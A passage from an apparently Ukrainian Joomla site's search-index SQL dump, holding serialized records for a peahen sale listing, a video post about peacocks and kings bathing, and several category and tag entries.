initial; background-color: rgb(255, 255, 255);\">В наявності самка 2019 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 180, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">Відео за посиланнями:&nbsp;<!--StartFragment--><a href=\"https://www.youtube.com/watch?v=NSxpoY-04GY\">https://www.youtube.com/watch?v=NSxpoY-04GY</a><!--EndFragment--></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0018_960x640.jpg\"><img src=\"https://malehus.in.ua/images/stories/gl_0018_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p><p><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"128\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-30 14:44:50\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:29:\"Павліни (павичі)\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:32:\"2451:chornokhvosta-samka-pavlina\";s:7:\"catslug\";s:19:\"128:pavliny-pavychi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:66:\"/index.php/holuby/pavliny-pavychi/2451-chornokhvosta-samka-pavlina\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:29:\"Павліни (павичі)\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:29:\"Павліни (павичі)\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2451\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=2451:chornokhvosta-samka-pavlina&catid=128\";s:5:\"title\";s:48:\"Чорнохвоста самка павліна\";s:11:\"description\";s:328:\" В наявності самка 2019 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 180, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=NSxpoY-04GY \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 14:44:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 14:44:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4574,'index.php?option=com_content&view=article&id=2453','index.php?option=com_content&view=article&id=2453:u-pavliniv-ta-kingiv-bannij-den&catid=127','У павлінів та кінгів банний день',' ','2020-08-30 17:54:03','104b58830b42b2771815a04a721168a3',1,1,1,'*','2020-08-30 14:54:03','0000-00-00 00:00:00','2020-08-30 14:54:03','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2453\";s:5:\"alias\";s:31:\"u-pavliniv-ta-kingiv-bannij-den\";s:7:\"summary\";s:200:\"<p><span contenteditable=\"false\" class=\"f-video-editor fr-fvn fr-tnv\"><iframe width=\"640\" height=\"360\" src=\"//www.youtube.com/embed/0U9GZJRK4Q8\" frameborder=\"0\" allowfullscreen=\"\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"127\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-30 14:54:03\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Кінги\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:36:\"2453:u-pavliniv-ta-kingiv-bannij-den\";s:7:\"catslug\";s:9:\"127:kinhy\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:60:\"/index.php/holuby/kinhy/2453-u-pavliniv-ta-kingiv-bannij-den\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Кінги\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Кінги\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2453\";s:5:\"route\";s:91:\"index.php?option=com_content&view=article&id=2453:u-pavliniv-ta-kingiv-bannij-den&catid=127\";s:5:\"title\";s:59:\"У павлінів та кінгів банний день\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 14:54:03\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 14:54:03\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4580,'index.php?option=com_content&view=category&id=8','index.php?option=com_content&view=category&id=8','головна',' ','2020-08-30 19:01:50','6c2299db70dc4db7e795e0218c4260cd',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-16 18:36:35','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:1:\"8\";s:5:\"alias\";s:8:\"novini-2\";s:7:\"summary\";s:3:\"			\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 16:01:50\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:2:\"13\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:10:\"8:novini-2\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:10:\"/index.php\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=category&id=8\";s:5:\"route\";s:47:\"index.php?option=com_content&view=category&id=8\";s:5:\"title\";s:14:\"головна\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-16 18:36:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4581,'index.php?option=com_users&view=category&id=132','index.php?option=com_content&view=category&id=132','qqq',' ','2020-08-30 18:51:39','3ba13e7cd2d9cfcb0e4fea9014de37f7',1,0,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-30 15:49:01','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"132\";s:5:\"alias\";s:3:\"qqq\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:9:\"com_users\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 15:49:01\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"171\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:7:\"132:qqq\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:17:\"/index.php?id=132\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_users&view=category&id=132\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=132\";s:5:\"title\";s:3:\"qqq\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 15:49:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4585,'index.php?option=com_tags&view=tag&id=2','index.php?option=com_tags&view=tag&id=2:home','home',' ','2020-08-30 19:02:41','718b325af3f1ec33e2d4d128a49e1372',1,-2,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-30 15:49:31','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:15:{s:2:\"id\";s:1:\"2\";s:5:\"alias\";s:4:\"home\";s:7:\"summary\";s:1:\"	\";s:10:\"created_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:8:\"modified\";s:19:\"2020-08-30 15:49:31\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:14:\"tag_link_class\";s:16:\"label label-info\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:6:\"2:home\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:3:\"tag\";s:4:\"path\";s:34:\"/index.php/component/tags/tag/home\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:9:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";i:8;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:3:{s:4:\"Type\";a:1:{s:3:\"Tag\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"Tag\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:39:\"index.php?option=com_tags&view=tag&id=2\";s:5:\"route\";s:44:\"index.php?option=com_tags&view=tag&id=2:home\";s:5:\"title\";s:4:\"home\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";s:2:\"-2\";s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 15:49:31\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4591,'index.php?option=com_content&view=category&id=133','index.php?option=com_content&view=category&id=133','Фото та відео',' ','2020-08-30 20:51:31','9430d45a20edc558d9be0a2dc96bdcd0',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-30 17:51:31','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"133\";s:5:\"alias\";s:13:\"foto-ta-video\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 